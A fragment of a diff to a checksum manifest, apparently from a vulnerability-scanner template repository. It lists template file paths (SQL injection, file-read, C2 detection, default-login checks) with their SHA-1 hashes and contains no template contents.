http/vulnerabilities/other/castel-digital-sqli.yaml:a2e2da7ae8d480b2bf621f6b11979cc2d8a434ff
http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:5cc2684a9526439bcafcefeb5f6799fde0bbb067
http/vulnerabilities/other/chamilo-lms-sqli.yaml:27b1d49422d8918bf53b61424d7aee17a6bee23d
http/vulnerabilities/other/chamilo-lms-xss.yaml:a4317a1e2cc11bf9333dcebbed04c9a16dc71199
@ -7729,7 +7768,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82
http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6
http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e
http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2
http/vulnerabilities/other/kiwitcms-json-rpc.yaml:e8b89bed712fc69f4294693e5af6f7a35fc3c2d0
http/vulnerabilities/other/kiwitcms-json-rpc.yaml:ce6d41bfb15c8218ccb1a6102888c78db08e4224
http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174
http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e
http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24
@ -8277,6 +8316,7 @@ javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f0
javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94
javascript/detection/oracle-tns-listener.yaml:f55369203a5da17a5573fe29d9dc9ebd31a94dff
javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04
javascript/enumeration/checkpoint-firewall-enum.yaml:d4f9be682667d24c3cd3482dfd6b71505b2d52df
javascript/enumeration/minecraft-enum.yaml:85094e9d7bb8925d7cf6af204ad2bca70f910d16
javascript/enumeration/mysql/mysql-default-login.yaml:433fb8e13500f2df3410db099c09bc92f63a7e86
javascript/enumeration/mysql/mysql-info.yaml:51a1f610998dc0a1849fb4ba1e60b7bf421d992c
@ -8395,7 +8435,7 @@ network/detection/totemomail-smtp-detect.yaml:fef66d409db7afc6efd33ddcae751cd3a7
network/detection/vmware-authentication-daemon-detect.yaml:fe32f8021fd370465c0f97fff15ea59eb34e42fd
network/detection/vnc-service-detect.yaml:22f648aa53fa7fb08f258bcd06fa4b15d80eebca
network/detection/weblogic-iiop-detect.yaml:05bf3f6fdfa938cfb88ee0e5f27da5e1b8d70bfa
network/detection/weblogic-t3-detect.yaml:06f88de334b8bae8279d944c0cf4467919930e93
network/detection/weblogic-t3-detect.yaml:d9f9d79b5176d8eb2abd9bf4de3ce84a0220fd99
network/detection/wing-ftp-detect.yaml:79fe3254d4657278f122977cda7145287f7b993c
network/detection/ws_ftp-ssh-detect.yaml:558ac2fd876a7239ddfd7c5c9433769f166644bd
network/detection/xlight-ftp-service-detect.yaml:c1bcbafb4cd2ad7a5b4b6c7b947779ee08367781
@ -8469,6 +8509,7 @@ profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8
profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2
profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8
ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa
ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91
ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521
@ -8498,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
templates-checksum.txt:435e6048b63deb8509219645aafa7043cc65537c
templates-checksum.txt:4cfa9d7c34a68646e25c38e6844c2f4bb42ef473
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4